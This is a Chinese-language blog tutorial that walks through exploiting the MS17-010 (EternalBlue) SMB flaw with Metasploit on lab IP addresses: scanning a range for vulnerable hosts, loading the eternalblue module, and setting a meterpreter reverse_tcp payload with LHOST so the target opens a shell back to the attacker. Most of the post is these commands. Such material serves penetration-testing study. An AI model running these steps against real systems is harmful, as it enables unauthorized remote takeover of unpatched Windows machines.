Metasploit--MS17_010(永恒之蓝)

布满荆棘的人生 2022-10-30 09:26 186阅读 0赞

### 文章目录 ###

*   *   *  MS17\_010漏洞利用
         *  Auxiliary辅助探测模块
         *   *   *  介绍
                 *  命令
         *  Exploit漏洞利用模块
         *  Payload攻击载荷模块
         *   *   *  介绍
                 *  命令
         *  摘抄

### MS17\_010漏洞利用 ###

msfconsole #进入metasploit框架
    search ms17_010#寻找MS17_010漏洞

*  这里找到了两个模块：
 *  第一个辅助模块是探测主机是否存在MS17\_010漏洞，
 *  第二个是漏洞利用模块，我们先探测哪些主机存在漏洞  
    ![在这里插入图片描述][watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQxOTAxMTIy_size_16_color_FFFFFF_t_70]  
    ![在这里插入图片描述][watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQxOTAxMTIy_size_16_color_FFFFFF_t_70 1]

### Auxiliary辅助探测模块 ###

##### 介绍 #####

*  该模块不会直接在攻击机和靶机之间建立访问
 *  只负责执行扫描，嗅探，指纹识别等相关功能以辅助渗透测试

##### 命令 #####

use auxiliary/scanner/smb/smb_ms17_010
    show options # 查看这个模块需要配置的信息
      RHOSTS 参数是要探测主机的ip或ip范围，我们探测一个ip范围内的主机是否存在漏洞
    set RHOSTS 192.168.232.100-129.168.232.250 #扫描ip段内存在漏洞的主机
    exploit #攻击，这里有+号的就是可能存在漏洞的主机，这里有1个主机存在漏洞

![在这里插入图片描述][20210218173711366.png]  
![在这里插入图片描述][watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQxOTAxMTIy_size_16_color_FFFFFF_t_70 2]  
![在这里插入图片描述][20210218173828674.png]

### Exploit漏洞利用模块 ###

use exploit/windows/smb/ms17_010_eternalblue #选择漏洞攻击模块
    info #查看这个漏洞的信息
    show targets # 查看可攻击的系统平台，这个命令显示该攻击模块针对哪些特定操作系统版本、语言版本的系统

![在这里插入图片描述][watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQxOTAxMTIy_size_16_color_FFFFFF_t_70 3]  
![在这里插入图片描述][watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQxOTAxMTIy_size_16_color_FFFFFF_t_70 4]

### Payload攻击载荷模块 ###

##### 介绍 #####

*  攻击载荷是我们期望在目标系统在被渗透攻击之后完成的实际攻击功能的代码，
 *  成功渗透目标后，用于在目标系统上运行任意命令。

##### 命令 #####

show payloads  # 查看攻击载荷，该命令可以查看当前漏洞利用模块下可用的所有Payload
    set payload windows/x64/meterpreter/reverse_tcp #设置攻击载荷
    show options  #查看模块需要配置的参数
    set RHOSTS    192.168.232.143 # 设置RHOST，也就是要攻击主机的ip
    set LHOST 192.168.232.140 #设置LHOST，也就是我们主机的ip，用于接收从目标机弹回来的shell
    如果我们这里不设置lport的话，默认是4444端口监听
    exploit #攻击

![在这里插入图片描述][watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQxOTAxMTIy_size_16_color_FFFFFF_t_70 5]  
![在这里插入图片描述][watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQxOTAxMTIy_size_16_color_FFFFFF_t_70 6]  
![在这里插入图片描述][watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQxOTAxMTIy_size_16_color_FFFFFF_t_70 7]  
![在这里插入图片描述][watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQxOTAxMTIy_size_16_color_FFFFFF_t_70 8]

### 摘抄 ###

**过简单的生活，纯洁严肃，真诚自然，  
做正义的友人，虔诚善良，  
慈悲为怀，不懈工作。  
– 约瑟夫・布罗茨基 《悲伤与理智》**

[watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQxOTAxMTIy_size_16_color_FFFFFF_t_70]: /images/20221024/f29b329f357b480cbfa79a365c381d4a.png
[watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQxOTAxMTIy_size_16_color_FFFFFF_t_70 1]: /images/20221024/8e37078a7bea4652b641bb98bc65330a.png
[20210218173711366.png]: /images/20221024/4eba566532a649a68f26983a826f9726.png
[watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQxOTAxMTIy_size_16_color_FFFFFF_t_70 2]: /images/20221024/822f93744ff74561bb544ae252ed5c40.png
[20210218173828674.png]: /images/20221024/fe1af60bbb5a4e9d9339e976621bd6f8.png
[watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQxOTAxMTIy_size_16_color_FFFFFF_t_70 3]: /images/20221024/df0fb92d9b40404d8a6fa1129379babf.png
[watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQxOTAxMTIy_size_16_color_FFFFFF_t_70 4]: /images/20221024/934ba913be324da1af074f8c20f83f46.png
[watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQxOTAxMTIy_size_16_color_FFFFFF_t_70 5]: /images/20221024/af29d708dfa44132b45c1eaebd13355f.png
[watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQxOTAxMTIy_size_16_color_FFFFFF_t_70 6]: /images/20221024/11f4fcf185bc43bcb136185cdf7cec04.png
[watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQxOTAxMTIy_size_16_color_FFFFFF_t_70 7]: /images/20221024/449fed7fca5540d8840059854f0bdbff.png
[watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQxOTAxMTIy_size_16_color_FFFFFF_t_70 8]: /images/20221024/62b37487b0d246b9854f2ccc9c6aceb6.png